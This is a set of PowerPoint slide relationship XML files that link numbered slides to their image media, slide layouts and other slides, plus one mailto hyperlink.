<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide266.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide295.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide264.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide289.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.xml"/><Relationship Id="rId16"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slide" Target="slide262.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide282.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide259.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide312.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide275.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide257.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide270.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide305.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25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5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293.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image292.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide257.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5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295.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26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01.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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3.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s>
</file>

<file path=ppt/slides/_rels/slide26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08.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image307.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide266.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9.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image311.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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image" Target="../media/image31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42.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><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1.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317.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16.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image315.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image314.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image318.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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27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77.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78.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331.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33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33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image332.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide279.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336.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.gif"/><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39.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image338.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image337.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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8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3.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284.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346.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.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bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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352.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide286.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7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image358.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image357.gif"/><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image" Target="../media/image355.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide288.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image359.gif"/><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290.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360.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36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291.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image365.bmp"/><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68.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image367.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image366.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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370.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide293.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73.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image372.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image375.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide297.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80.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image379.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image378.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide298.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382.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide299.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85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.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42.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42.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide300.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image386.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88.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image387.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image389.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391.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide304.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95.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.bmp"/><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image" Target="../media/image398.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image397.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide307.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.bmp"/><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401.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide308.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309.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404.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.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1.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396.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image408.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07.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image406.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image405.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image414.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image409.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image413.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12.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image411.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide314.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image" Target="../media/image415.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image419.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18.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image417.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image416.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide315.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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image425.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image420.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42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23.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image422.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image421.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide317.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428.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image427.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31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42.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9.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hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image432.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42.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42.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435.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image434.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide322.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide356.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide324.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide346.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.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slide" Target="slide340.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide335.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide371.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide328.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide363.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide323.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32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25.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437.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44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slide" Target="slide442.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image442.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide326.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image447.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44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2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449.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image448.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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29.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53.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331.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6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332.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64.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s>
</file>

<file path=ppt/slides/_rels/slide33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33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469.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image468.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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36.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73.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37.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77.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33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39.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slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image481.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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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4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3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image484.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image483.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide342.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2.xml"/><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76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.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4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78.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide345.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image492.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image491.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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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47.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9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5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image494.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image493.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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9.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image498.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image497.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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70.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide350.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image507.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50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05.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image504.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image503.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image508.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide351.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slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.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s>
</file>

<file path=ppt/slides/_rels/slide35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15.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image514.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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54.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19.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18.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image517.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image516.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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18.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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5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20.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide358.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image" Target="../media/image522.png"/><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slide" Target="slide322.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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36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24.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image523.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image522.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide361.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9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26.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image525.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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28.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image527.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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6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31.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image529.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide365.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35.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34.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image533.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image532.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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36.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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6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37.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide369.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41.bmp"/><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40.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image539.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image538.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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37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3.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image542.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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9.jpe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7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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image544.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image546.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide374.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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image548.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></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22.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slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image552.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50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image549.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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54.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37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442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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252.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide390.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide382.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slide" Target="slide381.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38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84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId2"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slide" Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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image" Target="../media/image559.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide386.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47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562.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide388.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6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s>
</file>

<file path=ppt/slides/_rels/slide389.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70.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9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image568.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image567.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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91.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74.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73.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image572.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image571.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image576.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image575.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide393.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79.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78.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image577.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image562.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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slide" Target="slide381.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide396.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83.jpe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2.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image581.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image580.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide397.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87.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6.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image585.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image584.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39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99.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image558.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image557.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89.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image588.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 Target="slide442.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image592.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image591.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide401.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587.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95.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image594.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image593.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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403.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slide" Target="slide442.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image599.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98.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image597.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image596.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image601.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image587.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image602.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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40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image" Target="../media/image603.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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606.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image605.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image604.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image587.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image607.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40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42.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 Target="slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.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slide" Target="slide442.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide410.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
